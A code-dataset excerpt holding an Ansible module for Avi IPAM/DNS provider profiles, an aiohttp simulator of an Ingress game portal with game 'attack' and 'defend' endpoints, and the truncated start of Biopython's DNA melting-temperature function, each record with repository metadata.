# module_check: supported
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_ipamdnsproviderprofile
author: Gaurav Rastogi (@grastogi23) <grastogi@avinetworks.com>
short_description: Module for setup of IpamDnsProviderProfile Avi RESTful Object
description:
- This module is used to configure IpamDnsProviderProfile object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
allocate_ip_in_vrf:
description:
- If this flag is set, only allocate ip from networks in the virtual service vrf.
- Applicable for avi vantage ipam only.
- Field introduced in 17.2.4.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.5"
type: bool
aws_profile:
description:
- Provider details if type is aws.
azure_profile:
description:
- Provider details if type is microsoft azure.
- Field introduced in 17.2.1.
version_added: "2.5"
custom_profile:
description:
- Provider details if type is custom.
- Field introduced in 17.1.1.
gcp_profile:
description:
- Provider details if type is google cloud.
infoblox_profile:
description:
- Provider details if type is infoblox.
internal_profile:
description:
- Provider details if type is avi.
name:
description:
- Name for the ipam/dns provider profile.
required: true
openstack_profile:
description:
- Provider details if type is openstack.
proxy_configuration:
description:
- Field introduced in 17.1.1.
tenant_ref:
description:
- It is a reference to an object of type tenant.
type:
description:
- Provider type for the ipam/dns provider profile.
- Enum options - IPAMDNS_TYPE_INFOBLOX, IPAMDNS_TYPE_AWS, IPAMDNS_TYPE_OPENSTACK, IPAMDNS_TYPE_GCP, IPAMDNS_TYPE_INFOBLOX_DNS, IPAMDNS_TYPE_CUSTOM,
- IPAMDNS_TYPE_CUSTOM_DNS, IPAMDNS_TYPE_AZURE, IPAMDNS_TYPE_INTERNAL, IPAMDNS_TYPE_INTERNAL_DNS, IPAMDNS_TYPE_AWS_DNS, IPAMDNS_TYPE_AZURE_DNS.
required: true
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the ipam/dns provider profile.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Create IPAM DNS provider setting
avi_ipamdnsproviderprofile:
controller: '{{ controller }}'
username: '{{ username }}'
password: '{{ password }}'
internal_profile:
dns_service_domain:
- domain_name: ashish.local
num_dns_ip: 1
pass_through: true
record_ttl: 100
- domain_name: guru.local
num_dns_ip: 1
pass_through: true
record_ttl: 200
ttl: 300
name: Ashish-DNS
tenant_ref: Demo
type: IPAMDNS_TYPE_INTERNAL
"""
RETURN = '''
obj:
description: IpamDnsProviderProfile (api/ipamdnsproviderprofile) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
    """Ansible entry point: declare the module's argument spec and hand off
    to the generic Avi API layer for the ipamdnsproviderprofile object."""
    argument_specs = dict(
        state=dict(default='present',
                   choices=['absent', 'present']),
        avi_api_update_method=dict(default='put',
                                   choices=['put', 'patch']),
        avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
        allocate_ip_in_vrf=dict(type='bool',),
        aws_profile=dict(type='dict',),
        azure_profile=dict(type='dict',),
        custom_profile=dict(type='dict',),
        gcp_profile=dict(type='dict',),
        infoblox_profile=dict(type='dict',),
        internal_profile=dict(type='dict',),
        name=dict(type='str', required=True),
        openstack_profile=dict(type='dict',),
        proxy_configuration=dict(type='dict',),
        tenant_ref=dict(type='str',),
        type=dict(type='str', required=True),
        url=dict(type='str',),
        uuid=dict(type='str',),
    )
    # Mix in the connection options (controller, username, password, ...)
    # shared by every Avi module.
    argument_specs.update(avi_common_argument_spec())
    module = AnsibleModule(
        argument_spec=argument_specs, supports_check_mode=True)
    # Fail fast when the Avi SDK import at the top of the file failed.
    if not HAS_AVI:
        return module.fail_json(msg=(
            'Avi python API SDK (avisdk>=17.1) is not installed. '
            'For more details visit https://github.com/avinetworks/sdk.'))
    return avi_ansible_api(module, 'ipamdnsproviderprofile',
                           set([]))
if __name__ == '__main__':
main()
|
alxgu/ansible
|
lib/ansible/modules/network/avi/avi_ipamdnsproviderprofile.py
|
Python
|
gpl-3.0
| 5,896
|
[
"VisIt"
] |
bd3def9f45d5b3ae5637f47a9b3ed31f52d6170dc95fe8c9e9770a42611646e6
|
#!/usr/bin/env python3
### VERY MUCH PYTHON 3 !!!
"""
Example for aiohttp.web basic server
Uses a background timer to read from a file to update a shared datastructure
Because it's going to be used as a simulator
Made available under the MIT license as follows:
Copyright 2017 Brian Bulkowski brian@bulkowski.org
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import sys
if sys.version_info[0] < 3:
raise "Must be using Python 3"
import threading
import time
import datetime
import os
import itertools
import copy
import json
import argparse
import traceback
import asyncio
import textwrap
from aiohttp import web
from random import randint
# Relay class
class Relay:
    """State of one output relay driven by the portal simulator.

    ``state``: 1 means the contacts sit in their normal NO/NC position,
    0 means flipped.

    ``mode`` selects how portal ownership drives the relay (0-4):
      1 - NO/NC while the portal is controlled, flipped when neutral
      2 - flipped while the portal is controlled, NO/NC when neutral
      3 - NO/NC while controlled; flipped for 3 seconds on a faction
          change, then reverts
      4 - closed while the portal is controlled; flipped for 1.5 seconds
    """

    def __init__(self):
        self.state = 0
        self.mode = 0
# todo: since a mod has an owner, should make it a class as well, for parallelism sake
# Resonator class... because portals have more than one resonator
class Resonator:
    """One of a portal's eight resonators: level, health, distance, owner."""
    # Compass slots a resonator can occupy.
    valid_positions = [ "E", "NE", "N", "NW", "W", "SW", "S", "SE" ]
    # Total XM capacity of a resonator at each level (index 0 == empty slot).
    level_energy = [0, 10, 15, 20, 25, 30, 40, 50, 60]
    def __init__(self, position, values=None ):
        """Create a resonator at ``position``.

        ``values`` optionally supplies level/health/distance/owner; a
        resonator with zero level or zero health is normalized to fully empty.
        """
        # print ("Resonator create: position ",position)
        self.position = position
        if values == None:
            self.level = 0
            self.health = 0
            self.distance = 0
            # may not update position, not a value
            self.owner = ""
        else:
            self.level = int(values.get("level",0))
            self.health = int(values.get("health",0))
            self.distance = int(values.get("distance",0))
            self.owner = str(values.get("owner", ""))
            if (self.level == 0) or (self.health == 0):
                self.level = 0
                self.health = 0
                self.distance = 0
                # note: position does not change
                self.owner = ""
        # print ("Resontaor level: ",self.level)
    def check(self):
        """Validate types and ranges; print a reason and return False on the
        first inconsistency, True when the resonator state is legal."""
        if type(self.level) is not int:
            print("bad level type ",type(self.level))
            return False
        if self.level < 0 or self.level > 8:
            print("bad level value ",self.level)
            return False
        if type(self.health) is not int:
            print("bad level health type ",type(self.health))
            return False
        if self.health < 0 or self.health > 100:
            print("bad level value ",self.health)
            return False
        if type(self.position) is not str:
            print("bad position type ",type(self.position))
            return False
        if self.position not in self.valid_positions:
            print("bad position: ",self.position)
            return False
        if type(self.distance) is not int:
            print("bad distance type ",type(self.distance))
            return False
        if self.distance < 0 or self.distance > 100:
            print("bad distance value ",self.distance)
            return False
        if (self.level == 0) and (self.health > 0):
            print("zero level and non-zero health: illegal ")
            return False
        if (self.health == 0) and (self.level > 0):
            print("zero health and non-zero level: illegal ")
            return False
        return True
    def setLevel(self, level):
        """Set level 0-8; level 0 also zeroes health and distance.
        Returns False (and changes nothing) for out-of-range values."""
        # wire up debugging....
        if level > 8:
            return False
        if level < 0:
            return False
        self.level = level
        if level == 0:
            self.health = 0
            self.distance = 0
        return True
    def setHealth(self, health):
        """Set health 0-100; health 0 also zeroes level and distance.
        Returns False (and changes nothing) for out-of-range values."""
        if health > 100:
            return False
        if health < 0:
            return False
        self.health = health
        if health == 0:
            self.level = 0
            self.distance = 0
        return True
    def addEnergy(self, concentrated=False):
        """Recharge this resonator with a random XM burst (stronger when
        ``concentrated``); overflow past 100% promotes it a level."""
        if self.level == 0:
            # special case - take it to level 1, 100%
            self.level = 1
            self.health = 100
        else:
            if concentrated:
                deltaEnergy = 10 * randint(15,25)
            else:
                deltaEnergy = 10 * randint(10,25)
            newEnergy = self.health * Resonator.level_energy[self.level] + deltaEnergy;
            newHealth = int(newEnergy/Resonator.level_energy[self.level])
            minHealth = min(self.health + 1, 100);
            if (newHealth > 100) :
                if self.level < 8:
                    self.setLevel(min(8, self.level+1))
                    # NOTE(review): newEnergy/level_energy is a float; max()
                    # appears to always resolve to the int minHealth, but
                    # confirm a float health can never leak through here.
                    self.setHealth(max(minHealth, newEnergy/Resonator.level_energy[self.level]))
                else:
                    self.setHealth(100)
            else:
                self.setHealth(newHealth);
    def removeEnergy(self, concentrated=False):
        """Drain a random XM burst (stronger when ``concentrated``); health
        is floored at 0, which also empties the resonator."""
        if (self.level == 0):
            return
        if concentrated:
            deltaEnergy = 10 * randint(25,45)
        else:
            deltaEnergy = 10 * randint(10,25)
        newEnergy = self.health * Resonator.level_energy[self.level] - deltaEnergy
        newHealth = int(newEnergy/Resonator.level_energy[self.level])
        self.setHealth(max(0, newHealth));
    def toLegacyStr(self):
        """Serialize to the legacy wire format (position included inline)."""
        # print (" grabbing reso string: level ",self.level)
        return '{{"level": {0}, "health": {1}, "position": "{2}"}}'.format(self.level, self.health, self.position)
    # without the position, sometimes that is implied
    def toBetterStr(self):
        """Serialize as a '"position": {...}' fragment for the dict format."""
        if self.level == 0:
            return'"{0}": {{"level": {1} }}'.format(self.position, self.level)
        else:
            return '"{0}": {{"level": {1}, "health": {2}, "distance": {3} }}'.format(self.position, self.level, self.health, self.distance)
# WARNING! This class has multithreaded access.
# Before you access the data structure, grab the lock and release afterward
# do not do anything blocking under the lock
class Portal:
    """Thread-shared model of one portal: faction, resonators, mods, links.

    WARNING! This class has multithreaded access.  Grab ``self.lock`` before
    touching the data structure and release it afterward; do not do anything
    blocking while holding the lock.
    """
    valid_positions = [ "E", "NE", "N", "NW", "W", "SW", "S", "SE" ]
    valid_mods = ["FA","HS-C","HS-R","HS-VR","LA-R","LA-VR","SBUL","MH-C","MH-R","MH-VR","PS-C","PS-R","PS-VR","AXA","T"]
    # Total XM capacity of a resonator at each level (index 0 == empty).
    reso_level_XM = [0.0, 1000.0, 1500.0, 2000.0, 2500.0, 3000.0, 4000.0, 5000.0, 6000.0 ]
    factionStr = ["neutral", "enlightenment", "resistance"]

    @staticmethod
    def getFactionId(faction):
        """Map a faction name to its numeric id; unknown names map to 0 (neutral)."""
        for idx in range(len(Portal.factionStr)):
            if Portal.factionStr[idx] == faction:
                print("Get faction id returns {0} for {1}".format(idx, faction))
                return idx
        return 0

    def __init__(self, id_, verbose):
        """Create a neutral portal with the given id; ``verbose`` enables
        before/after state dumps in setStatus."""
        self.reset()
        self.id_ = id_
        self.title = "default portal"
        self.lock = threading.Lock()
        self.create_time = time.time()
        self.verbose = verbose

    def reset(self):
        """Return the portal to the neutral, empty state (id, lock and
        creation time are untouched)."""
        self.faction = 0
        self.health = 0
        self.level = 0
        self.owner = None
        self.resonators = {}
        self.links = []
        self.mods = []

    def addEnergy(self, faction, resonatorId):
        """Recharge one resonator (``resonatorId``) or all of them.

        Charging a neutral portal captures it for ``faction`` and deploys a
        full set of fresh level-1 resonators.
        """
        with self.lock:
            if self.faction == 0:
                self.faction = faction
                # Clear out resonators, initialize a fresh full deployment.
                for position in Resonator.valid_positions:
                    reso = Resonator(position, {"level": 1, "health": 100, "owner": faction})
                    self.resonators[position] = reso
            else:
                if resonatorId:
                    self.resonators[resonatorId].addEnergy(concentrated=True)
                else:
                    for pos, resonator in self.resonators.items():
                        resonator.addEnergy()

    def removeEnergy(self, resonatorId):
        """Drain one resonator (``resonatorId``) or all of them; the portal
        goes neutral when every resonator is down."""
        with self.lock:
            if resonatorId:
                self.resonators[resonatorId].removeEnergy(concentrated=True)
            else:
                for pos, resonator in self.resonators.items():
                    resonator.removeEnergy()
            regimeStable = False
            for pos, resonator in self.resonators.items():
                if resonator.health > 0:
                    regimeStable = True
            if not regimeStable:
                self.faction = 0  # all resonators down. Back to neutral

    # returns a new object of the Portal type
    def dup(self):
        """Shallow duplicate used for edit-then-swap updates (the lock is not
        copied; the creation time is carried over).

        NOTE(review): resonators/links/mods are shared by reference, not
        deep-copied, so mutating the duplicate's containers also mutates the
        original's — confirm this is intended.
        """
        n = Portal(self.id_, self.verbose)
        n.faction = self.faction
        n.health = self.health
        n.level = self.level
        n.title = self.title
        n.owner = self.owner
        if self.resonators:
            n.resonators = self.resonators
        if self.links:
            n.links = self.links
        if self.mods:
            n.mods = self.mods
        n.lock = None
        n.create_time = self.create_time
        return n

    # carefully avoid the lock and the creation time:
    # otherwise we're copying the object into self; no return value
    def set(self, n):
        """Copy portal state from ``n`` into this object."""
        self.faction = n.faction
        self.health = n.health
        self.level = n.level
        self.title = n.title
        self.owner = n.owner
        self.resonators = n.resonators
        self.links = n.links
        self.mods = n.mods
        self.verbose = n.verbose

    # Level is calculated from resonator states so it is always correct.
    def getLevel(self):
        """Portal level: mean resonator level, truncated; 0 when neutral or
        without resonators."""
        if self.faction == 0:
            return 0
        if self.resonators == None:
            return 0
        if len(self.resonators) == 0:
            return 0
        level_sum = 0
        for k, v in self.resonators.items():
            level_sum += v.level
        return int(level_sum / 8)

    def getHealth(self):
        """Portal health in percent: current XM over maximum XM across the
        deployed resonators; 0 when neutral or without resonators."""
        if self.faction == 0:
            return 0
        if self.resonators == None:
            return 0
        if len(self.resonators) == 0:
            return 0
        xm_max = 0.0
        xm = 0.0
        for k, v in self.resonators.items():
            reso_xm = self.reso_level_XM[v.level]
            xm_max += reso_xm
            xm += (float(v.health) / 100.0) * reso_xm
        if xm < 0.00001:
            return 0
        r = int((xm / xm_max) * 100.0)
        if r > 100:
            r = 100
        return r

    # This function takes a JSON status line.
    # Returns a float for how long to delay - when to read the next line.
    def setStatus(self, jsonStr):
        """Apply a JSON status line to this portal.

        Builds an edited duplicate, validates it with ``check``, then swaps
        it in under the lock.  Raises on unparsable JSON or inconsistent
        state.  Returns the requested inter-line delay in seconds (0.0 when
        absent or non-numeric).
        """
        try:
            statusObj = json.loads(jsonStr)
        except Exception as ex:
            template = "Exception in Portal parsing the json string {0} occurred. Arguments:\n{1!r}"
            message = template.format(type(ex).__name__, ex.args)
            print( message )
            raise # pass it upstack
        if self.verbose:
            print ("+++++ object BEFORE changes: ",str(self))
        with self.lock:
            portal = self.dup()
        if "title" in statusObj:
            if statusObj.get("title"):
                portal.title = str(statusObj.get("title"))
        if "faction" in statusObj:
            portal.faction = int(statusObj.get("faction"))
            # Going neutral strips everything from the portal.
            if portal.faction == 0:
                portal.resonators = {}
                portal.mods = []
                portal.health = 0
                portal.level = 0
                portal.owner = None
        if "owner" in statusObj:
            portal.owner = str(statusObj.get("owner"))
        if "mods" in statusObj:
            portal.mods = list(statusObj.get("mods"))
        if "resonators" in statusObj:
            resonators = dict(statusObj.get("resonators"))
            for pos, values in resonators.items():
                r = Resonator(pos, values)
                portal.resonators[pos] = r
        # If we changed the resonators, update the health and level.
        portal.level = portal.getLevel()
        portal.health = portal.getHealth()
        # Validate the new object before swapping it in.
        if portal.check() == False:
            raise ValueError('JSON Portal line is not consistant')
        else:
            # copy the parts that should be copied (ie, not the lock or create time)
            with self.lock:
                self.set(portal)
        if self.verbose:
            print ("+++++ object after changes: ",str(self))
        # BUGFIX: accept integer delays too; previously a non-float "delay"
        # made this method silently return None.
        delay = statusObj.get("delay", 0.0)
        if isinstance(delay, (int, float)):
            return float(delay)
        return 0.0

    def getModsStr(self):
        """Render the mods list as a compact JSON-style array string,
        e.g. '["FA","T"]' (no spaces, matching the legacy wire format)."""
        if type(self.mods) != list:
            return '[]'
        if len(self.mods) == 0:
            return '[]'
        return '[' + ','.join('"{0}"'.format(mod) for mod in self.mods) + ']'

    # This is the "current form" that is missing a lot of information.
    def statusLegacy(self):
        """Serialize in the legacy wire format: resonators as a list."""
        resos = []
        num_entries = 0
        for k, v in self.resonators.items():
            # Skip empty slots, saving space & time.
            if v.level == 0:
                continue
            num_entries += 1
            resos.append(v.toLegacyStr())
            resos.append(",")
        # Take off the trailing comma if anything was emitted.
        if num_entries > 0:
            resos.pop()
        reso_string = ''.join(resos)
        return '{{"controllingFaction": {0}, "health": {1}, "level": {2}, "title": "{3}", "resonators": [{4}]}}'.format(
            self.faction, self.health, self.level, self.title, reso_string )

    # Not legacy! The cool-kid way, with resonators as a dict.
    def __str__(self):
        # Shortcut - neutral portal.
        if (self.faction == 0):
            return '{{"faction": 0, "health": 0, "level": 0, "title":"{0}", "resonators": {{}}, "mods": [] }}'.format(self.title)
        # Long way round.
        howmany = 0
        resos = []
        for pos, resonator in self.resonators.items():
            # Skip empty slots, saving space & time.
            if resonator.level == 0:
                continue
            howmany += 1
            resos.append(resonator.toBetterStr())
            resos.append(",")
        if (howmany > 0):
            resos.pop()
        reso_string = ''.join(resos)
        return '{{"faction": {0}, "health": {1}, "level": "{2}", "title": "{3}", "resonators": {{{4}}}, "mods": {5} }}'.format(
            self.faction, self.getHealth(), self.getLevel(), self.title, reso_string, self.getModsStr() )

    # Makes sure the status is valid and reasonable (no values beyond game state).
    def check(self):
        """Validate types and ranges of the whole portal state; print a
        reason and return False on the first inconsistency."""
        if type(self.faction) is not int:
            print("Portal faction type invalid, is ",type(self.faction))
            return False
        if self.faction < 0 or self.faction > 2:
            print("Illegal Portal faction value ",self.faction)
            return False
        if type(self.health) is not int:
            print("Portal health type invalid, is ",type(self.health))
            return False
        if self.health < 0 or self.health > 100:
            print("Illegal Portal health value ",self.health)
            return False
        if type(self.level) is not int:
            print("Portal level type invalid, is ",type(self.level))
            return False
        if self.level < 0 or self.level > 8:
            print("Illegal Portal level value ",self.level)
            return False
        if type(self.title) is not str:
            print("Portal title type invalid, is ",type(self.title))
            return False
        if len(self.title) > 300:
            print("Portal title seems too long")
            return False
        if type(self.resonators) is not dict:
            print("Portal resonator type wrong, is ",type(self.resonators))
            return False
        if len(self.resonators) > 8:
            # BUGFIX: was ``self.resontaors`` (typo), which raised
            # AttributeError here instead of reporting the inconsistency.
            print("Portal has incorrect number of resonators ",len(self.resonators))
            return False
        if (self.faction == 0) and (len(self.resonators) > 0):
            print(" portal must have faction if it has resonators ")
            return False
        for k, v in self.resonators.items():
            if k not in self.valid_positions:
                print("resonator has invalid position ",k)
                return False
            if v.check() == False:
                print(" resonator ",v," is not valid ")
                return False
        if type(self.mods) is not list:
            print("Mods wrong type, is ",type(self.mods))
            return False
        if len(self.mods) > 4:
            print("too many mods")
            return False
        if (self.faction == 0) and (len(self.mods) > 0):
            # BUGFIX: diagnostic previously said "resonators" here.
            print(" portal must have faction if it has mods ")
            return False
        for m in self.mods:
            if type(m) is not str:
                print (" type of one of the mods is wrong, is ",type(m))
                return False
            if m not in self.valid_mods:
                print ("invalid mod ",m)
                return False
        return True
#
# Background file processor
# 1. Open a file
# 2. Readline and set initial based on readline
# this is a co-routine. Post Python 3.5 the coroutine decorator turned into 'async'
async def fileReader(app):
    """Background coroutine: poll the simulator JSON file and feed each
    non-comment line to the shared Portal via setStatus().

    The file is re-opened from the start whenever EOF is reached, so the
    scenario loops forever. `delay` (from setStatus, or 0.5 s while waiting
    for the file to appear) paces the loop.

    Fix: the inner bare `except:` also swallowed asyncio.CancelledError,
    which prevented this task from being cancelled cleanly on shutdown;
    it now catches only Exception.
    """
    f = None
    file_line = 0
    portal = app['portal']
    file_name = app['filename']
    verbose = app['verbose']
    while True:
        # If no file object is open, try to (re)open one.
        if f == None:
            delay = 0.5
            try:
                f = open(file_name, 'r')
                file_line = 0
            except FileNotFoundError:
                # the most likely error
                print(" file ",file_name," was not found, trying again later")
            except Exception as ex:
                template = "An exception of type {0} occurred. Arguments:\n{1!r}"
                message = template.format(type(ex).__name__, ex.args)
                print( message )
        # If a file object exists, read a line and apply it to the portal.
        if f != None:
            delay = 0.0
            l = f.readline()
            file_line += 1
            # At end of file, close it so the next iteration reopens it.
            if len(l) == 0:
                f.close()
                f = None
                print( " Reloading file ")
            else:
                l = l.rstrip()
                l = l.lstrip()
                if (type(l) == str and len(l) > 0):
                    if (l[0] == '#'):
                        # comment line: ignore
                        pass
                    else:
                        try:
                            if verbose:
                                print("Portal set status: line ",file_line," using string: ",l)
                            delay = portal.setStatus(l)
                        except Exception:
                            # Fix: was a bare except (swallowed CancelledError).
                            print("WARNING: could not process line ",file_line," ignoring ")
                            traceback.print_exc(file=sys.stdout)
        if type(delay) != float:
            delay = 0.0
        await asyncio.sleep(delay)
#
# A number of debug / demo endpoints
# Note to self: you create a "Response" object, thn
# you manipulate it.
async def statusFaction(request):
    """GET /status/faction: return the portal's faction as plain text."""
    portal = request.app['portal']
    with portal.lock:
        faction = portal.faction
    return web.Response(text=str(faction))
async def statusHealth(request):
    """GET /status/health: return the portal's health as plain text."""
    portal = request.app['portal']
    with portal.lock:
        health = portal.health
    return web.Response(text=str(health))
# this needs UTF8 because names might have utf8
async def statusJson(request):
    """GET /status/json: the portal serialized via str() — UTF-8 because
    titles may contain non-ASCII characters; CORS open for browser demos."""
    portal = request.app['portal']
    with portal.lock:
        body = str(portal)
    return web.Response(text=body, charset='utf-8', headers={"Access-Control-Allow-Origin":"*"})
async def statusJsonLegacy(request):
    """GET /status/json (legacy flag): older flat-array JSON format."""
    portal = request.app['portal']
    with portal.lock:
        body = portal.statusLegacy()
    return web.Response(text=body, charset='utf-8')
# this rather pecular request does a delay, then responds, allowing you
# to test your polling code
async def delay(request):
    """Debug endpoint: respond after a fixed 10 s pause (for testing pollers)."""
    await asyncio.sleep(10.0)
    return web.Response(text="We delayed 10 seconds")
async def hello(request):
    """Trivial liveness endpoint."""
    return web.Response(text="Hello World!")
# And a couple of POST functions to handle attacks and defends
async def handleAttack(request):
    """POST /attack: remove energy from the portal.

    Expects form field 'faction' (must differ from the portal's own
    faction) and an optional 'resonator'; responds 400 on bad input.
    """
    postData = await request.post()
    for key in postData:
        print ("postdata key " + key)
    cors = {"Access-Control-Allow-Origin":"*"}
    if "faction" not in postData:
        print("No faction data, will not handle post!")
        return web.Response(status=400, headers=cors)
    faction = postData["faction"]
    if faction not in ("resistance", "enlightenment"):
        print("Invalid faction data {}, will not handle post".format(faction))
        return web.Response(status=400, headers=cors)
    factionId = Portal.getFactionId(faction)
    portal = request.app['portal']
    # Attacking your own portal is rejected.
    if Portal.factionStr[portal.faction] == faction:
        print("Cannot attack own portal, will not handle post")
        return web.Response(status=400, headers=cors)
    resonatorId = postData["resonator"] if "resonator" in postData else None
    print("Removing Energy")
    portal.removeEnergy(resonatorId)
    return web.Response(status=200, headers=cors)
async def handleDefend(request):
    """POST /defend: add energy to a neutral or friendly portal.

    Expects form field 'faction' and an optional 'resonator'; responds 400
    when the faction is missing, unknown, or belongs to the enemy.
    """
    postData = await request.post()
    cors = {"Access-Control-Allow-Origin":"*"}
    if "faction" not in postData:
        print("No faction data, will not handle post!")
        return web.Response(status=400, headers=cors)
    faction = postData["faction"]
    if faction not in ("resistance", "enlightenment"):
        print("Invalid faction {}, will not handle post".format(faction))
        return web.Response(status=400, headers=cors)
    factionId = Portal.getFactionId(faction)
    portal = request.app['portal']
    print("portal.faction is " + str(portal.faction))
    owner = Portal.factionStr[portal.faction]
    if owner != "neutral" and owner != faction:
        print("Cannot defend enemy's portal, will not handle post")
        return web.Response(status=400, headers=cors)
    resonatorId = postData["resonator"] if "resonator" in postData else None
    print("Adding energy!!")
    portal.addEnergy(factionId, resonatorId)
    return web.Response(status=200, headers=cors)
async def handleReset(request):
    """POST /reset: return the portal to its initial state."""
    request.app['portal'].reset()
    return web.Response(status=200, headers={"Access-Control-Allow-Origin":"*"})
# background tasks are covered near the bottom of this:
# http://aiohttp.readthedocs.io/en/stable/web.html
# Whatever tasks you create here will be executed and cancelled properly
async def start_background_tasks(app):
    # Launch the file-polling coroutine; the handle is stored so that
    # cleanup_background_tasks can cancel it on shutdown.
    # NOTE(review): app.loop is deprecated in newer aiohttp — confirm the
    # targeted aiohttp version.
    app['file_task'] = app.loop.create_task( fileReader(app))
async def cleanup_background_tasks(app):
    """Cancel the background file task and wait for it to finish."""
    app['file_task'].cancel()
    # NOTE(review): awaiting a cancelled task can raise CancelledError here;
    # this mirrors the aiohttp background-tasks example — confirm the
    # framework handles it during on_cleanup.
    await app['file_task']
async def init(app, args):
    """Wire routes, shared state, and options onto *app* and return it.

    Fix: the function previously shadowed its `app` parameter with a brand
    new web.Application(), silently discarding the instance the caller
    passed in; the passed-in application is now used directly.
    """
    app.router.add_get('/', hello)
    app.router.add_get('/delay', delay)
    app.router.add_get('/status/faction', statusFaction)
    app.router.add_get('/status/health', statusHealth)
    # --legacy selects the older flat-array JSON status format
    if args.legacy:
        app.router.add_get('/status/json', statusJsonLegacy)
    else:
        app.router.add_get('/status/json', statusJson)
    app.router.add_post('/attack', handleAttack)
    app.router.add_post('/defend', handleDefend)
    app.router.add_post('/reset', handleReset)
    # create the shared objects
    app['portal'] = Portal(1, args.verbose)
    app['relay'] = Relay()
    app['filename'] = args.filename
    app['verbose'] = args.verbose
    # background tasks are covered near the bottom of this:
    # http://aiohttp.readthedocs.io/en/stable/web.html
    #app.on_startup.append(start_background_tasks)
    #/app.on_cleanup.append(cleanup_background_tasks)
    return app
# Parse the command line options
parser = argparse.ArgumentParser(description="Ingress Portal TechThulu")
# NOTE: argparse applies type= to string defaults, so "5050" becomes int 5050.
parser.add_argument('--port', '-p', help="HTTP port", default="5050", type=int)
parser.add_argument('--file', '-f', dest="filename", help="Simulator JSON file to process", default="tecthulu.json", type=str)
parser.add_argument('--legacy', help="Use legacy JSON format", action='store_true')
parser.set_defaults(legacy=False)
parser.add_argument('--verbose', '-v', help="Puts Lots of Printing Noise in", action='store_true')
parser.set_defaults(verbose=False)
args = parser.parse_args()
print("starting TechThulu simulator with file ",args.filename," on port ",args.port)
# register all the async stuff: build and configure the application first,
# then hand it to aiohttp's blocking runner.
loop = asyncio.get_event_loop()
app = loop.run_until_complete(init(web.Application(), args))
# run the web server
web.run_app(app, port=args.port)
|
bbulkow/MagnusFlora
|
sim/portal_sim_decom.py
|
Python
|
mit
| 27,153
|
[
"Brian"
] |
826f3bb9263afb2c8745cc5e321762e44699016476b480f7738c1b4099e5036e
|
# Copyright 2004-2008 by Sebastian Bassi.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Calculate the thermodynamic melting temperatures of nucleotide sequences."""
import math
def Tm_staluc(s,dnac=50,saltc=50,rna=0):
    """Returns DNA/DNA tm using nearest neighbor thermodynamics.

    dnac is DNA concentration [nM]
    saltc is salt concentration [mM].
    rna=0 is for DNA/DNA (default), use 1 for RNA/RNA hybridisation.

    For DNA/DNA, see Allawi & SantaLucia (1997), Biochemistry 36: 10581-10594
    For RNA/RNA, see Xia et al (1998), Biochemistry 37: 14719-14735

    Example (fix: doctests now use print() so they run under Python 3):

    >>> print("%0.2f" % Tm_staluc('CAGTCAGTACGTACGTGTACTGCCGTA'))
    59.87
    >>> print("%0.2f" % Tm_staluc('CAGTCAGTACGTACGTGTACTGCCGTA', rna=True))
    68.14
    """
    #Credits:
    #Main author: Sebastian Bassi <sbassi@genesdigitales.com>
    #Overcount function: Greg Singer <singerg@tcd.ie>
    #Based on the work of Nicolas Le Novere <lenov@ebi.ac.uk> Bioinformatics.
    #17:1226-1227(2001)
    #This function returns better results than EMBOSS DAN because it uses
    #updated thermodynamics values and takes into account inicialization
    #parameters from the work of SantaLucia (1998).
    #Things to do:
    #+Detect complementary sequences. Change K according to result.
    #+Add support for heteroduplex (see Sugimoto et al. 1995).
    #+Correction for Mg2+. Now supports only monovalent ions.
    #+Put thermodinamics table in a external file for users to change at will
    #+Add support for danglings ends (see Le Novele. 2001) and mismatches.
    dh = 0 #DeltaH. Enthalpy
    ds = 0 #deltaS Entropy

    def tercorr(stri):
        # Terminal-base initiation corrections (PRIVATE).
        deltah = 0
        deltas = 0
        if rna==0:
            #DNA/DNA
            #Allawi and SantaLucia (1997). Biochemistry 36 : 10581-10594
            if stri.startswith('G') or stri.startswith('C'):
                deltah -= 0.1
                deltas += 2.8
            elif stri.startswith('A') or stri.startswith('T'):
                deltah -= 2.3
                deltas -= 4.1
            if stri.endswith('G') or stri.endswith('C'):
                deltah -= 0.1
                deltas += 2.8
            elif stri.endswith('A') or stri.endswith('T'):
                deltah -= 2.3
                deltas -= 4.1
            dhL = dh + deltah
            dsL = ds + deltas
            return dsL,dhL
        elif rna==1:
